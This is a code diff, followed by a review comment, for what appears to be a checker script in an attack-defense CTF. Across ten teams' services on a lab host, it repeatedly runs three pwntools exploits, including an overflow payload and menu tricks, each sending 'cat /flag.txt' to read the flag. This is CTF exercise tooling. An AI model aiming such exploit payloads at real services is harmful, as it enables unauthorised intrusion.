|
@ -1,9 +1,14 @@ |
|
|
#! /usr/bin/env python2 |
|
|
|
|
|
|
|
|
#! /usr/bin/env python3 |
|
|
# from pwn import context, remote |
|
|
# from pwn import context, remote |
|
|
from pwn import remote, context |
|
|
from pwn import remote, context |
|
|
from multiprocessing import pool |
|
|
|
|
|
context.log_level = "error" |
|
|
|
|
|
|
|
|
from multiprocessing import Pool |
|
|
|
|
|
from time import sleep |
|
|
|
|
|
import logging |
|
|
|
|
|
import os |
|
|
|
|
|
|
|
|
|
|
|
context.log_level = logging.ERROR |
|
|
|
|
|
|
|
|
|
|
|
INTERVAL = 60 |
|
|
HOST = "192.168.2.20" |
|
|
HOST = "192.168.2.20" |
|
|
TOTAL_TEAMS = 10 |
|
|
TOTAL_TEAMS = 10 |
|
|
FORMAT = "SlashRootCTF" |
|
|
FORMAT = "SlashRootCTF" |
|
@ -13,7 +18,7 @@ def poc0(host, port): |
|
|
with remote(host, port) as p: |
|
|
with remote(host, port) as p: |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
# print(msg) |
|
|
# print(msg) |
|
|
if "young" in msg: |
|
|
if "young" in msg: |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
@ -23,11 +28,11 @@ def poc0(host, port): |
|
|
p.sendline("4") |
|
|
p.sendline("4") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
for _ in range(10): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
# print flag |
|
|
# print flag |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
@ -48,7 +53,7 @@ def poc1(host, port): |
|
|
p.sendline("3") |
|
|
p.sendline("3") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("0") |
|
|
p.sendline("0") |
|
|
if "Who" in p.recvuntil(">"): |
|
|
|
|
|
|
|
|
if "Who" in p.recvuntil(">").decode('utf-8'): |
|
|
return False |
|
|
return False |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
@ -61,7 +66,7 @@ def poc1(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -76,17 +81,17 @@ def poc2(host, port): |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("6") |
|
|
p.sendline("6") |
|
|
if "Lv: 1000000" in p.recvuntil(">"): |
|
|
|
|
|
|
|
|
if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): |
|
|
p.sendline("2") |
|
|
p.sendline("2") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("4") |
|
|
p.sendline("4") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
for _ in range(10): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -95,9 +100,50 @@ def poc2(host, port): |
|
|
return False |
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc(host, port): |
|
|
|
|
|
with remote(host, port) as p: |
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
|
|
if "Who" in msg: |
|
|
|
|
|
p.sendline("Leo") |
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
|
|
if "Leo" in msg: |
|
|
|
|
|
p.sendline("Y") |
|
|
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
|
|
if "What" in msg: |
|
|
|
|
|
return True |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def check(team): |
|
|
|
|
|
port = (60004 + (team*100)) |
|
|
|
|
|
r = poc(HOST, port) |
|
|
|
|
|
r0 = poc0(HOST, port) |
|
|
|
|
|
r1 = poc1(HOST, port) |
|
|
|
|
|
r2 = poc2(HOST, port) |
|
|
|
|
|
return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def init_logging(logFileName: str, debug: bool = False): |
|
|
|
|
|
logFormatter = logging.Formatter( |
|
|
|
|
|
fmt="[%(asctime)s][%(levelname)s] %(message)s", |
|
|
|
|
|
datefmt='%d-%b-%y %H:%M:%S') |
|
|
|
|
|
|
|
|
|
|
|
rootLogger = logging.getLogger("checker") |
|
|
|
|
|
|
|
|
|
|
|
consoleHandler = logging.StreamHandler() |
|
|
|
|
|
consoleHandler.setFormatter(logFormatter) |
|
|
|
|
|
rootLogger.addHandler(consoleHandler) |
|
|
|
|
|
|
|
|
|
|
|
rootLogger.setLevel(logging.DEBUG if debug else logging.INFO) |
|
|
|
|
|
|
|
|
|
|
|
return rootLogger |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
if __name__ == "__main__": |
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
|
|
|
r0 = poc0(HOST, (60004 + (i*100))) |
|
|
|
|
|
r1 = poc1(HOST, (60004 + (i*100))) |
|
|
|
|
|
r2 = poc2(HOST, (60004 + (i*100))) |
|
|
|
|
|
print("Team [%s] %s %s %s" % (i, r0, r1, r2)) |
|
|
|
|
|
|
|
|
checker_logger = init_logging("checker.log") |
|
|
|
|
|
while True: |
|
|
|
|
|
with Pool(TOTAL_TEAMS) as p: |
|
|
|
|
|
results = p.map(check, range(1, TOTAL_TEAMS+1)) |
|
|
|
|
|
for result in results: |
|
|
|
|
|
checker_logger.info(result) |
|
|
|
|
|
sleep(INTERVAL) |
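Review bot: An exception in any one probe takes down the whole checker, because `check()` calls `poc`, `poc0`, `poc1` and `poc2` unguarded and `p.map` re-raises a worker's exception in the parent, which ends the `while True` loop. pwntools raises when `remote()` cannot connect and `recvuntil` raises `EOFError` when the peer closes early, so one team with its service down is enough; a service that accepts and then stalls would, as far as I can tell, block `recvuntil` indefinitely because no timeout is set. I would record a per-probe error state in `check()` as sketched below and set a bounded `context.timeout` next to `context.log_level`. Separately, `init_logging` never uses `logFileName`, so nothing reaches `checker.log`; adding `fileHandler = logging.FileHandler(logFileName)` with the same formatter and `rootLogger.addHandler(fileHandler)` would fix that.

```python
def check(team):
    port = 60004 + (team * 100)
    outcomes = []
    for probe in (poc, poc0, poc1, poc2):
        try:
            outcomes.append(probe(HOST, port))
        except Exception as exc:  # connect failure, EOF, decode error
            # Report the failure for this team instead of aborting the round.
            outcomes.append("ERR:" + type(exc).__name__)
    return "Team [{:02d}] {} {} {} {}".format(team, *outcomes)
```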